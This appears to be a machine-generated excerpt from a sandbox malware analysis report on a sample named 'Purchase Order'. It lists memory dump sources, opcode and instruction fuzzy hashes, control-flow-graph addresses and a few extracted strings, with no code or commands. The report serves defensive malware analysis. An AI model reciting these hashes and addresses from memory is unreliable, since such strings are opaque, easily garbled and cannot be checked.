                                                                                                  • Instruction ID: 6cd53123ab53ac10a828c7f888b2ffd6ea0a0d626470a77c9c7ddffb494f477c
                                                                                                  • Opcode Fuzzy Hash: c6f8d2b8bf2415e95c062aa5b01f2de9bd1d40af807e99908a9b96b84ffa176b
                                                                                                  • Instruction Fuzzy Hash: 99E1D174E00218CFEB54CFA9D944B9DBBB2BF89304F1081A9D809BB3A5DB355A85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a2d5d4391fba19645f62ff4c88f58c24eb4ffdaaac5d598eb23dd6d6a8e95e9a
                                                                                                  • Instruction ID: e055bea4499075c2fb874e7bb934d882d5045947453222865d2f0de03ae3421b
                                                                                                  • Opcode Fuzzy Hash: a2d5d4391fba19645f62ff4c88f58c24eb4ffdaaac5d598eb23dd6d6a8e95e9a
                                                                                                  • Instruction Fuzzy Hash: 7CD1A174E002188FDB54DFA5D985B9DBBB2BF89300F5081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387085241.0000000039D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d40000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52ef1e769407bf97b6f489ee662adca248c652eddb9ec3e6eae130a2abc7a55f
                                                                                                  • Instruction ID: 4b3da26d0bac7e8309ab60013b96bfd5d9ef541fe2a76cb16195ddf587882d62
                                                                                                  • Opcode Fuzzy Hash: 52ef1e769407bf97b6f489ee662adca248c652eddb9ec3e6eae130a2abc7a55f
                                                                                                  • Instruction Fuzzy Hash: 54D1A278E01218CFDB54DFA5C985B9DBBB2BF89300F5081A9D808AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dac6663910fb07f419657d9f82dff33f23f9ebaa03f19011e57c771c6ee79457
                                                                                                  • Instruction ID: a930c5c305810f9b1cbb1ee71dbd0e2680ebc2d9ffdcec27d3abed9f5cbf9c47
                                                                                                  • Opcode Fuzzy Hash: dac6663910fb07f419657d9f82dff33f23f9ebaa03f19011e57c771c6ee79457
                                                                                                  • Instruction Fuzzy Hash: 6DD1AE78E00218DFDB54DFA9D984B9DBBB2BF89300F1081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b0c62c8cf707b792b2dc0cb6d30eb92f39dbdd225778d7d761a31bc01cf6c3f
                                                                                                  • Instruction ID: 4d94c047bf957b1b77f50f56979f54ed6e05529b352f0c237c06aec6e98cd893
                                                                                                  • Opcode Fuzzy Hash: 6b0c62c8cf707b792b2dc0cb6d30eb92f39dbdd225778d7d761a31bc01cf6c3f
                                                                                                  • Instruction Fuzzy Hash: 93C19174E00218CFDB54DFA9C954B9DBBB2BF89300F1081A9D809AB365DB359A86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9ec2eac1cbfb45a8fbf9cfccdc2e4f7d37c3932c8cc4987ebca02e4ba9987f43
                                                                                                  • Instruction ID: 470ed0c1fac4995adc6db0fb1df9fbebd487cfef1c4e1953f5e8c25ce9302869
                                                                                                  • Opcode Fuzzy Hash: 9ec2eac1cbfb45a8fbf9cfccdc2e4f7d37c3932c8cc4987ebca02e4ba9987f43
                                                                                                  • Instruction Fuzzy Hash: 3FC1C174E00218CFDB54DFA9D984B9DBBB2BF89300F1081A9D809AB365DB359E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3239be2c2c301058e495c156aafa9a7356cd5989a4d1e7df1eb123033dc163ef
                                                                                                  • Instruction ID: 15168d927ed8a6082a42c12ec386c389ce7ae6f2cb6cd3db2e0b6096864e1ace
                                                                                                  • Opcode Fuzzy Hash: 3239be2c2c301058e495c156aafa9a7356cd5989a4d1e7df1eb123033dc163ef
                                                                                                  • Instruction Fuzzy Hash: B9A1A3B5E012198FEB64CF6AC944B9EFBF6BF88300F14C1A9D809A7250DB345A85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4988c3d30bdc2371d93b02328e7e9cdc267132c44936e25c0dd5c961a370e5f
                                                                                                  • Instruction ID: 7a0f3d2902213bec1ad2fc3560a314904209a21485c0bec607e1a96f83e19ce5
                                                                                                  • Opcode Fuzzy Hash: b4988c3d30bdc2371d93b02328e7e9cdc267132c44936e25c0dd5c961a370e5f
                                                                                                  • Instruction Fuzzy Hash: 65A10674D00208CFDB14DFA9C994BDDBBB5FF88314F20826AE409AB2A1DB749985CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6e278ae12d90a00d2395f332cc00d00140fc65f14fbb28e3b3169ee31473574
                                                                                                  • Instruction ID: e340c4c42582100909e6ad470fb47a330d589be59ab92aacf1efd2a0382642e0
                                                                                                  • Opcode Fuzzy Hash: d6e278ae12d90a00d2395f332cc00d00140fc65f14fbb28e3b3169ee31473574
                                                                                                  • Instruction Fuzzy Hash: 04A10674D00208CFEB14DFA8C594BDDBBB5FF89314F20826AE409AB2A1DB749985CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 76372c7fa990c3d23c53b33801c9053571474fa01a9f90756802354fad1f2aa8
                                                                                                  • Instruction ID: d6844dcacfd444bfc71b39e7c4e27df749a632c1d92694ee88ed87b8325fdef1
                                                                                                  • Opcode Fuzzy Hash: 76372c7fa990c3d23c53b33801c9053571474fa01a9f90756802354fad1f2aa8
                                                                                                  • Instruction Fuzzy Hash: B6A1B2B5E012198FEB64CF6AC944BDEFBF2AF89300F14C1A9D809A7250DB345A85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23782dc23937489a6a2f0a9f551768ab3249d7faf1446e5f1a32a2a5878e97c7
                                                                                                  • Instruction ID: 85ed46c723ca99728e7e0f2df7f7c4a3edd16b8d29ecd731ac23482772be0039
                                                                                                  • Opcode Fuzzy Hash: 23782dc23937489a6a2f0a9f551768ab3249d7faf1446e5f1a32a2a5878e97c7
                                                                                                  • Instruction Fuzzy Hash: 5D91F474900318CFEB10DFA8C954BDDBBB5FF49310F20926AE809AB2A1DB749985CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387027047.0000000039D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d30000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 55f3570519243c3f1bcbf2963af1c10eff846751aa181aa5a0cb793673e0058e
                                                                                                  • Instruction ID: cc3a3cf5de8464d1a902e3be472c95fb8ce012ea805be5074556ae9ab2f4c5c6
                                                                                                  • Opcode Fuzzy Hash: 55f3570519243c3f1bcbf2963af1c10eff846751aa181aa5a0cb793673e0058e
                                                                                                  • Instruction Fuzzy Hash: 1F81C074E01218CFDB04DFA9D991ADDBBB2BF88304F608529D814BB364DB399946CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387085241.0000000039D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d40000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ce4ec71a852d3252f01162b03b5d46ab89e83abf47027a89078f453957dfd75
                                                                                                  • Instruction ID: 874b218e0fd104871a843d44f1ab1fc27f82c1a22ae230f9fee0c45f2b5e637f
                                                                                                  • Opcode Fuzzy Hash: 4ce4ec71a852d3252f01162b03b5d46ab89e83abf47027a89078f453957dfd75
                                                                                                  • Instruction Fuzzy Hash: 5181B174E00218DFDB04DFA9D991ADDBBB2BF88300F608529D814BB365DB399946CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387085241.0000000039D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d40000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9b5af0262e5591e69fa01e94677f2380f54be9edfae356c0a828d01352d7dada
                                                                                                  • Instruction ID: 0e4fa92d9dd601ac1688804ca45e3ab092003f4be96c6491d5952ae11f626bf7
                                                                                                  • Opcode Fuzzy Hash: 9b5af0262e5591e69fa01e94677f2380f54be9edfae356c0a828d01352d7dada
                                                                                                  • Instruction Fuzzy Hash: D281B174E00218CFDB04DFA9D991AEDBBB2BF88304F608529D814BB365DB399946CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387085241.0000000039D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d40000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c830ce4c034a50b968f7aca767cc6daffdce045142509d46670a282ae9e57e39
                                                                                                  • Instruction ID: c5e9bf7f9da41f88a2bd5077afecb1a6af8d829771c787f98cf04f94ddb24992
                                                                                                  • Opcode Fuzzy Hash: c830ce4c034a50b968f7aca767cc6daffdce045142509d46670a282ae9e57e39
                                                                                                  • Instruction Fuzzy Hash: 5F81AF74E00218DFDB04DFA9D991ADDBBB6BF88300F608529D814BB369DB399946CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fe20746e3272e438479b6f6311329d454de290a7aa9c9d0535ff48bf4ea07501
                                                                                                  • Instruction ID: 20a151c82b2218e03ed9df1362ea0c67aa9ffeda28b461a267261c0260c2fb3e
                                                                                                  • Opcode Fuzzy Hash: fe20746e3272e438479b6f6311329d454de290a7aa9c9d0535ff48bf4ea07501
                                                                                                  • Instruction Fuzzy Hash: 7A81A6B5E016198FEB68CF6AC944B9EBBF2BF89300F14C1E9D409A7254DB744A85CF11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3876f62fe3e1629fda29a90ad15d050f8fcff6ba34c7ffe5b250d1fee3a37fa3
                                                                                                  • Instruction ID: a460a6be03c4506919958072c87b3d391690376353a9260d4a84bf56d7bf0cfc
                                                                                                  • Opcode Fuzzy Hash: 3876f62fe3e1629fda29a90ad15d050f8fcff6ba34c7ffe5b250d1fee3a37fa3
                                                                                                  • Instruction Fuzzy Hash: 1D51A474E00308DFDB18DFAAD984A9DBBF6BF89300F208029E819AB365DB345945CF15
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be8918fb88ef8868c54b45f6a7c0a55855419665fce19c38ab091387faaef52f
                                                                                                  • Instruction ID: 5b764ce54ecb0c10681d1a1e28e8e605127920cdc2d227466211ba6239efb4b9
                                                                                                  • Opcode Fuzzy Hash: be8918fb88ef8868c54b45f6a7c0a55855419665fce19c38ab091387faaef52f
                                                                                                  • Instruction Fuzzy Hash: 0951B674E00208DFDB18DFEAD984A9DBBF2BF89300F248029E819AB365DB345845CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6ca60acc4c4fcc6fdcb37bdf3eb5c8f3a1cea467559454557efbe7a19da91e64
                                                                                                  • Instruction ID: 677589c8165f487f66c98353177ad204b2317e316e047c57cbcdc92b6408cd4a
                                                                                                  • Opcode Fuzzy Hash: 6ca60acc4c4fcc6fdcb37bdf3eb5c8f3a1cea467559454557efbe7a19da91e64
                                                                                                  • Instruction Fuzzy Hash: F6414B71D01609CFDB09DFB6E84169DBBB2BF99304F68D46AC414AB2A4DB365842CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a32b25df48da1295b8513bc47f997bc547947312d18d0cdfc18587f3ae9a7930
                                                                                                  • Instruction ID: a4ea022127b993f879720cd98b161e58bbb860e2a090bafb54b52c0e9c1febe3
                                                                                                  • Opcode Fuzzy Hash: a32b25df48da1295b8513bc47f997bc547947312d18d0cdfc18587f3ae9a7930
                                                                                                  • Instruction Fuzzy Hash: 1651F1B0D012088BEB18CFAAD8447DDBBF2BF88304F20C16AD418BB250DB395986CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 06b7e3f46c2b0074bda62f1fe5aadc6ff4dbbd552247e9d2c3e459f63e098f2e
                                                                                                  • Instruction ID: 2ff68d023228dab365955c25180cb2eee4614f4fcddb8c9b0f380bc3c8571e6e
                                                                                                  • Opcode Fuzzy Hash: 06b7e3f46c2b0074bda62f1fe5aadc6ff4dbbd552247e9d2c3e459f63e098f2e
                                                                                                  • Instruction Fuzzy Hash: 4C41D1B0E006098BEB18CFAAD9547DDBBF2BF88304F10C16AD418BB294DB355946CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7222619f43960bdf27e4b2e90607845ba2df4b16372a5293c2668f8ba17293f1
                                                                                                  • Instruction ID: fc3ceb34f684d0e5372cc8c6a793047c59c14746e61138a8745226836458bce9
                                                                                                  • Opcode Fuzzy Hash: 7222619f43960bdf27e4b2e90607845ba2df4b16372a5293c2668f8ba17293f1
                                                                                                  • Instruction Fuzzy Hash: 1041E574E01208CFEB18DFAAD94469EBBF2BF89300F20D12AC414BB265DB355946CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3387085241.0000000039D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d40000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2708ce1ec65a7ab1cfa4311d82caabda9384aed3e8194aa3bb955832bcef00d4
                                                                                                  • Instruction ID: cf33d58e31be324251d3f8d969349f205b94e1d30ce9008787caf9c9e5dcb639
                                                                                                  • Opcode Fuzzy Hash: 2708ce1ec65a7ab1cfa4311d82caabda9384aed3e8194aa3bb955832bcef00d4
                                                                                                  • Instruction Fuzzy Hash: B041D574E01218CBEB08DFAAD9456DEBBF2BF89300F54D16AD418BB264EB355946CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1f8c26145eb9ba2f8a5d8cfa04bcee2c0fb821900261722a62ae2c5b37137bfe
                                                                                                  • Instruction ID: 54cf587d6acefb73af83f90ac206419a80e54b12ea1b3b895def516767151222
                                                                                                  • Opcode Fuzzy Hash: 1f8c26145eb9ba2f8a5d8cfa04bcee2c0fb821900261722a62ae2c5b37137bfe
                                                                                                  • Instruction Fuzzy Hash: B341D474D01248CFEB14CFAAC95469DBBF2AF89300F20C22AD815BB265DB355946CF41
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 772d89fd9ac18bd46dc478566a4d0a673df0d53763942b684cbd74250c0b30cb
                                                                                                  • Instruction ID: f7e3094fad1b0d4c55b4995103f2fc275ba63667cdbd02c1a6947025b4439cf0
                                                                                                  • Opcode Fuzzy Hash: 772d89fd9ac18bd46dc478566a4d0a673df0d53763942b684cbd74250c0b30cb
                                                                                                  • Instruction Fuzzy Hash: 1C410675E006188BEB58DFAAD8406DDFBF2BF89300F50D12AD418BB264EB395946CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386868967.0000000039CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39CA0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ca0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 96827bb1bc2cdfd41eea7625d448416ee95694c556ab5f54878be97f092937e2
                                                                                                  • Instruction ID: 9ac55705689dc73fff303deaaf27e5292305748934cf1fb83d39f702a80d1ad5
                                                                                                  • Opcode Fuzzy Hash: 96827bb1bc2cdfd41eea7625d448416ee95694c556ab5f54878be97f092937e2
                                                                                                  • Instruction Fuzzy Hash: 7C41D570E016498FEB08DFAAD9506DEBBF2BF89304F10D12AD418BB264DB395946CF40

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 526 119150-11963e 601 119b90-119bc5 526->601 602 119644-119654 526->602 606 119bd1-119bef 601->606 607 119bc7-119bcc 601->607 602->601 603 11965a-11966a 602->603 603->601 605 119670-119680 603->605 605->601 608 119686-119696 605->608 620 119bf1-119bfb 606->620 621 119c66-119c72 606->621 609 119cb6-119cbb 607->609 608->601 610 11969c-1196ac 608->610 610->601 612 1196b2-1196c2 610->612 612->601 613 1196c8-1196d8 612->613 613->601 615 1196de-1196ee 613->615 615->601 616 1196f4-119704 615->616 616->601 617 11970a-11971a 616->617 617->601 619 119720-119b8f 617->619 620->621 625 119bfd-119c09 620->625 626 119c74-119c80 621->626 627 119c89-119c95 621->627 632 119c0b-119c16 625->632 633 119c2e-119c31 625->633 626->627 635 119c82-119c87 626->635 636 119c97-119ca3 627->636 637 119cac-119cb0 call 119d48 627->637 632->633 646 119c18-119c22 632->646 638 119c33-119c3f 633->638 639 119c48-119c54 633->639 635->609 636->637 648 119ca5-119caa 636->648 637->609 638->639 651 119c41-119c46 638->651 640 119c56-119c5d 639->640 641 119cbc-119cd6 639->641 640->641 645 119c5f-119c64 640->645 645->609 646->633 653 119c24-119c29 646->653 648->609 651->609 653->609
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$jUX6$$]q$$]q
                                                                                                  • API String ID: 0-2235420872
                                                                                                  • Opcode ID: 65dbf81161c792b3b4ee4edd29f634c6a8e7c5dab291dbe7b9f72e96aeb1e40b
                                                                                                  • Instruction ID: fb8ef99cbb433ddb3d4cf9f8c1779ff1988f55d471fe157e6d5bc3bda4fe4243
                                                                                                  • Opcode Fuzzy Hash: 65dbf81161c792b3b4ee4edd29f634c6a8e7c5dab291dbe7b9f72e96aeb1e40b
                                                                                                  • Instruction Fuzzy Hash: 52525270A00218CFEB55DBA4D960B9EBBB7EF84300F1080A9D54A6B366CF359E85DF51

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 714 39ab3768-39ab3771 715 39ab377a-39ab377d 714->715 716 39ab3773-39ab3778 714->716 718 39ab377f-39ab3784 715->718 719 39ab3786-39ab3789 715->719 717 39ab37b2-39ab37b5 716->717 718->717 720 39ab378b-39ab3790 719->720 721 39ab3792-39ab3795 719->721 720->717 722 39ab379e-39ab37a1 721->722 723 39ab3797-39ab379c 721->723 724 39ab37aa-39ab37ad 722->724 725 39ab37a3-39ab37a8 722->725 723->717 726 39ab37af 724->726 727 39ab37b6-39ab3826 724->727 725->717 726->717 734 39ab382b-39ab383a call 39ab3710 727->734 737 39ab383c-39ab3857 734->737 738 39ab3883-39ab3886 734->738 737->738 751 39ab3859-39ab385d 737->751 739 39ab3888-39ab388e 738->739 740 39ab389c-39ab38cb 738->740 739->734 742 39ab3890 739->742 746 39ab38cd-39ab38d0 740->746 747 39ab38d7-39ab38dd 740->747 743 39ab3892-39ab3899 742->743 746->747 748 39ab38d2-39ab38d5 746->748 749 39ab38df-39ab38e2 747->749 750 39ab38f1-39ab3925 747->750 748->747 752 39ab3928-39ab3980 748->752 749->750 753 39ab38e4-39ab38e6 749->753 754 39ab385f-39ab3864 751->754 755 39ab3866-39ab386f 751->755 760 39ab3987-39ab3a07 752->760 753->750 756 39ab38e8-39ab38eb 753->756 754->743 755->738 757 39ab3871-39ab387a 755->757 756->750 756->760 757->738 761 39ab387c-39ab3881 757->761 779 39ab3a09-39ab3a0d 760->779 780 39ab3a27-39ab3a7d 760->780 761->743 816 39ab3a10 call 39ab3808 779->816 817 39ab3a10 call 39ab3768 779->817 818 39ab3a10 call 39ab3ad1 779->818 819 39ab3a10 call 39ab3757 779->819 820 39ab3a10 call 39ab3b05 779->820 786 39ab3a88-39ab3a91 780->786 787 39ab3a7f-39ab3a86 780->787 781 39ab3a13-39ab3a24 789 39ab3a9c 786->789 790 39ab3a93-39ab3a9a 786->790 788 39ab3aa3-39ab3aac 787->788 791 39ab3ab2-39ab3acf 788->791 792 39ab3b40-39ab3b44 788->792 789->788 790->788 793 39ab3b4d-39ab3b69 791->793 792->793 821 39ab3b47 call 39ab3c50 792->821 797 39ab3b6b-39ab3b6e 793->797 798 39ab3b70-39ab3bca 793->798 797->798 799 39ab3bd2-39ab3bdb 797->799 798->799 801 39ab3bdd-39ab3be0 799->801 802 39ab3be2-39ab3c18 799->802 801->802 803 39ab3c47-39ab3c4d 801->803 802->803 812 39ab3c1a-39ab3c3f 802->812 812->803 816->781 817->781 818->781 819->781 820->781 821->793
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                  • API String ID: 0-1597716666
                                                                                                  • Opcode ID: a14a955fa4b785003980897bd6fa33500d33602347c9d27e354464fa4ef21be2
                                                                                                  • Instruction ID: 1bac8879fbbb5b99ebda50a8611c53130b1f963cb9b2bc605470a5c00f71492d
                                                                                                  • Opcode Fuzzy Hash: a14a955fa4b785003980897bd6fa33500d33602347c9d27e354464fa4ef21be2
                                                                                                  • Instruction Fuzzy Hash: FBD13974B052448FDB05DB68C890A9E7FBAEF89720F144269E805DF3A1CE71ED46CB91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
